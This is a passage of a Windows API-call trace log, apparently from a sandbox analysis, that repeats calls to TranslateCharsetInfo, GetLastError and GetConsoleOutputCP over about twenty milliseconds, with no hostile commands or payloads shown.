	[0059.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.276] GetLastError () returned 0xcb
	[0059.276] GetConsoleOutputCP () returned 0x1b5
	[0059.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.277] GetLastError () returned 0xcb
	[0059.277] GetConsoleOutputCP () returned 0x1b5
	[0059.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.277] GetLastError () returned 0xcb
	[0059.277] GetConsoleOutputCP () returned 0x1b5
	[0059.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.277] GetLastError () returned 0xcb
	[0059.277] GetConsoleOutputCP () returned 0x1b5
	[0059.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.277] GetLastError () returned 0xcb
	[0059.277] GetConsoleOutputCP () returned 0x1b5
	[0059.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.277] GetLastError () returned 0xcb
	[0059.277] GetConsoleOutputCP () returned 0x1b5
	[0059.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.278] GetLastError () returned 0xcb
	[0059.278] GetConsoleOutputCP () returned 0x1b5
	[0059.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.278] GetLastError () returned 0xcb
	[0059.278] GetConsoleOutputCP () returned 0x1b5
	[0059.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.278] GetLastError () returned 0xcb
	[0059.278] GetConsoleOutputCP () returned 0x1b5
	[0059.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.278] GetLastError () returned 0xcb
	[0059.278] GetConsoleOutputCP () returned 0x1b5
	[0059.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.278] GetLastError () returned 0xcb
	[0059.278] GetConsoleOutputCP () returned 0x1b5
	[0059.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.278] GetLastError () returned 0xcb
	[0059.278] GetConsoleOutputCP () returned 0x1b5
	[0059.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.279] GetLastError () returned 0xcb
	[0059.279] GetConsoleOutputCP () returned 0x1b5
	[0059.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.279] GetLastError () returned 0xcb
	[0059.279] GetConsoleOutputCP () returned 0x1b5
	[0059.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.279] GetLastError () returned 0xcb
	[0059.279] GetConsoleOutputCP () returned 0x1b5
	[0059.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.279] GetLastError () returned 0xcb
	[0059.279] GetConsoleOutputCP () returned 0x1b5
	[0059.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.279] GetLastError () returned 0xcb
	[0059.279] GetConsoleOutputCP () returned 0x1b5
	[0059.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.279] GetLastError () returned 0xcb
	[0059.279] GetConsoleOutputCP () returned 0x1b5
	[0059.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.280] GetLastError () returned 0xcb
	[0059.280] GetConsoleOutputCP () returned 0x1b5
	[0059.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.280] GetLastError () returned 0xcb
	[0059.280] GetConsoleOutputCP () returned 0x1b5
	[0059.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.280] GetLastError () returned 0xcb
	[0059.280] GetConsoleOutputCP () returned 0x1b5
	[0059.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.280] GetLastError () returned 0xcb
	[0059.280] GetConsoleOutputCP () returned 0x1b5
	[0059.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.280] GetLastError () returned 0xcb
	[0059.280] GetConsoleOutputCP () returned 0x1b5
	[0059.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.281] GetLastError () returned 0xcb
	[0059.281] GetConsoleOutputCP () returned 0x1b5
	[0059.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.281] GetLastError () returned 0xcb
	[0059.281] GetConsoleOutputCP () returned 0x1b5
	[0059.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.281] GetLastError () returned 0xcb
	[0059.281] GetConsoleOutputCP () returned 0x1b5
	[0059.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.281] GetLastError () returned 0xcb
	[0059.281] GetConsoleOutputCP () returned 0x1b5
	[0059.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.281] GetLastError () returned 0xcb
	[0059.281] GetConsoleOutputCP () returned 0x1b5
	[0059.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.282] GetLastError () returned 0xcb
	[0059.282] GetConsoleOutputCP () returned 0x1b5
	[0059.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.282] GetLastError () returned 0xcb
	[0059.282] GetConsoleOutputCP () returned 0x1b5
	[0059.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.282] GetLastError () returned 0xcb
	[0059.282] GetConsoleOutputCP () returned 0x1b5
	[0059.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.282] GetLastError () returned 0xcb
	[0059.282] GetConsoleOutputCP () returned 0x1b5
	[0059.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.282] GetLastError () returned 0xcb
	[0059.282] GetConsoleOutputCP () returned 0x1b5
	[0059.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.282] GetLastError () returned 0xcb
	[0059.282] GetConsoleOutputCP () returned 0x1b5
	[0059.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.283] GetLastError () returned 0xcb
	[0059.283] GetConsoleOutputCP () returned 0x1b5
	[0059.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.283] GetLastError () returned 0xcb
	[0059.283] GetConsoleOutputCP () returned 0x1b5
	[0059.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.283] GetLastError () returned 0xcb
	[0059.283] GetConsoleOutputCP () returned 0x1b5
	[0059.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.283] GetLastError () returned 0xcb
	[0059.283] GetConsoleOutputCP () returned 0x1b5
	[0059.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.283] GetLastError () returned 0xcb
	[0059.283] GetConsoleOutputCP () returned 0x1b5
	[0059.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.283] GetLastError () returned 0xcb
	[0059.284] GetConsoleOutputCP () returned 0x1b5
	[0059.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.284] GetLastError () returned 0xcb
	[0059.284] GetConsoleOutputCP () returned 0x1b5
	[0059.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.284] GetLastError () returned 0xcb
	[0059.284] GetConsoleOutputCP () returned 0x1b5
	[0059.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.284] GetLastError () returned 0xcb
	[0059.284] GetConsoleOutputCP () returned 0x1b5
	[0059.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.284] GetLastError () returned 0xcb
	[0059.284] GetConsoleOutputCP () returned 0x1b5
	[0059.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.284] GetLastError () returned 0xcb
	[0059.284] GetConsoleOutputCP () returned 0x1b5
	[0059.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.285] GetLastError () returned 0xcb
	[0059.285] GetConsoleOutputCP () returned 0x1b5
	[0059.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.285] GetLastError () returned 0xcb
	[0059.285] GetConsoleOutputCP () returned 0x1b5
	[0059.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.285] GetLastError () returned 0xcb
	[0059.285] GetConsoleOutputCP () returned 0x1b5
	[0059.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.285] GetLastError () returned 0xcb
	[0059.285] GetConsoleOutputCP () returned 0x1b5
	[0059.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.285] GetLastError () returned 0xcb
	[0059.285] GetConsoleOutputCP () returned 0x1b5
	[0059.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.285] GetLastError () returned 0xcb
	[0059.285] GetConsoleOutputCP () returned 0x1b5
	[0059.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.286] GetLastError () returned 0xcb
	[0059.286] GetConsoleOutputCP () returned 0x1b5
	[0059.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.286] GetLastError () returned 0xcb
	[0059.286] GetConsoleOutputCP () returned 0x1b5
	[0059.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.286] GetLastError () returned 0xcb
	[0059.286] GetConsoleOutputCP () returned 0x1b5
	[0059.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.286] GetLastError () returned 0xcb
	[0059.286] GetConsoleOutputCP () returned 0x1b5
	[0059.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.286] GetLastError () returned 0xcb
	[0059.286] GetConsoleOutputCP () returned 0x1b5
	[0059.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.286] GetLastError () returned 0xcb
	[0059.286] GetConsoleOutputCP () returned 0x1b5
	[0059.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.287] GetLastError () returned 0xcb
	[0059.287] GetConsoleOutputCP () returned 0x1b5
	[0059.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.287] GetLastError () returned 0xcb
	[0059.287] GetConsoleOutputCP () returned 0x1b5
	[0059.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.287] GetLastError () returned 0xcb
	[0059.287] GetConsoleOutputCP () returned 0x1b5
	[0059.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.287] GetLastError () returned 0xcb
	[0059.287] GetConsoleOutputCP () returned 0x1b5
	[0059.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.287] GetLastError () returned 0xcb
	[0059.287] GetConsoleOutputCP () returned 0x1b5
	[0059.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.287] GetLastError () returned 0xcb
	[0059.287] GetConsoleOutputCP () returned 0x1b5
	[0059.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.288] GetLastError () returned 0xcb
	[0059.288] GetConsoleOutputCP () returned 0x1b5
	[0059.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.288] GetLastError () returned 0xcb
	[0059.288] GetConsoleOutputCP () returned 0x1b5
	[0059.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.288] GetLastError () returned 0xcb
	[0059.288] GetConsoleOutputCP () returned 0x1b5
	[0059.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.288] GetLastError () returned 0xcb
	[0059.288] GetConsoleOutputCP () returned 0x1b5
	[0059.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.288] GetLastError () returned 0xcb
	[0059.288] GetConsoleOutputCP () returned 0x1b5
	[0059.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.288] GetLastError () returned 0xcb
	[0059.288] GetConsoleOutputCP () returned 0x1b5
	[0059.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.289] GetLastError () returned 0xcb
	[0059.289] GetConsoleOutputCP () returned 0x1b5
	[0059.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.289] GetLastError () returned 0xcb
	[0059.289] GetConsoleOutputCP () returned 0x1b5
	[0059.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.289] GetLastError () returned 0xcb
	[0059.289] GetConsoleOutputCP () returned 0x1b5
	[0059.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.289] GetLastError () returned 0xcb
	[0059.289] GetConsoleOutputCP () returned 0x1b5
	[0059.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.289] GetLastError () returned 0xcb
	[0059.289] GetConsoleOutputCP () returned 0x1b5
	[0059.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.290] GetLastError () returned 0xcb
	[0059.290] GetConsoleOutputCP () returned 0x1b5
	[0059.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.290] GetLastError () returned 0xcb
	[0059.290] GetConsoleOutputCP () returned 0x1b5
	[0059.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.290] GetLastError () returned 0xcb
	[0059.290] GetConsoleOutputCP () returned 0x1b5
	[0059.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.290] GetLastError () returned 0xcb
	[0059.290] GetConsoleOutputCP () returned 0x1b5
	[0059.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.290] GetLastError () returned 0xcb
	[0059.290] GetConsoleOutputCP () returned 0x1b5
	[0059.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.290] GetLastError () returned 0xcb
	[0059.290] GetConsoleOutputCP () returned 0x1b5
	[0059.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.291] GetLastError () returned 0xcb
	[0059.291] GetConsoleOutputCP () returned 0x1b5
	[0059.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.291] GetLastError () returned 0xcb
	[0059.291] GetConsoleOutputCP () returned 0x1b5
	[0059.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.291] GetLastError () returned 0xcb
	[0059.291] GetConsoleOutputCP () returned 0x1b5
	[0059.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.291] GetLastError () returned 0xcb
	[0059.291] GetConsoleOutputCP () returned 0x1b5
	[0059.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.291] GetLastError () returned 0xcb
	[0059.291] GetConsoleOutputCP () returned 0x1b5
	[0059.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.291] GetLastError () returned 0xcb
	[0059.291] GetConsoleOutputCP () returned 0x1b5
	[0059.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.292] GetLastError () returned 0xcb
	[0059.292] GetConsoleOutputCP () returned 0x1b5
	[0059.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.292] GetLastError () returned 0xcb
	[0059.292] GetConsoleOutputCP () returned 0x1b5
	[0059.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.292] GetLastError () returned 0xcb
	[0059.292] GetConsoleOutputCP () returned 0x1b5
	[0059.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.292] GetLastError () returned 0xcb
	[0059.292] GetConsoleOutputCP () returned 0x1b5
	[0059.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.292] GetLastError () returned 0xcb
	[0059.292] GetConsoleOutputCP () returned 0x1b5
	[0059.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.292] GetLastError () returned 0xcb
	[0059.292] GetConsoleOutputCP () returned 0x1b5
	[0059.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.293] GetLastError () returned 0xcb
	[0059.293] GetConsoleOutputCP () returned 0x1b5
	[0059.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.293] GetLastError () returned 0xcb
	[0059.293] GetConsoleOutputCP () returned 0x1b5
	[0059.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.293] GetLastError () returned 0xcb
	[0059.293] GetConsoleOutputCP () returned 0x1b5
	[0059.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.293] GetLastError () returned 0xcb
	[0059.293] GetConsoleOutputCP () returned 0x1b5
	[0059.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.293] GetLastError () returned 0xcb
	[0059.293] GetConsoleOutputCP () returned 0x1b5
	[0059.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.293] GetLastError () returned 0xcb
	[0059.293] GetConsoleOutputCP () returned 0x1b5
	[0059.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.294] GetLastError () returned 0xcb
	[0059.294] GetConsoleOutputCP () returned 0x1b5
	[0059.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.294] GetLastError () returned 0xcb
	[0059.294] GetConsoleOutputCP () returned 0x1b5
	[0059.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.294] GetLastError () returned 0xcb
	[0059.294] GetConsoleOutputCP () returned 0x1b5
	[0059.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.294] GetLastError () returned 0xcb
	[0059.294] GetConsoleOutputCP () returned 0x1b5
	[0059.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.294] GetLastError () returned 0xcb
	[0059.294] GetConsoleOutputCP () returned 0x1b5
	[0059.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.294] GetLastError () returned 0xcb
	[0059.294] GetConsoleOutputCP () returned 0x1b5
	[0059.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.295] GetLastError () returned 0xcb
	[0059.295] GetConsoleOutputCP () returned 0x1b5
	[0059.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.295] GetLastError () returned 0xcb
	[0059.295] GetConsoleOutputCP () returned 0x1b5
	[0059.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.295] GetLastError () returned 0xcb
	[0059.295] GetConsoleOutputCP () returned 0x1b5
	[0059.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.295] GetLastError () returned 0xcb
	[0059.295] GetConsoleOutputCP () returned 0x1b5
	[0059.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.295] GetLastError () returned 0xcb
	[0059.295] GetConsoleOutputCP () returned 0x1b5
	[0059.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.296] GetLastError () returned 0xcb
	[0059.296] GetConsoleOutputCP () returned 0x1b5
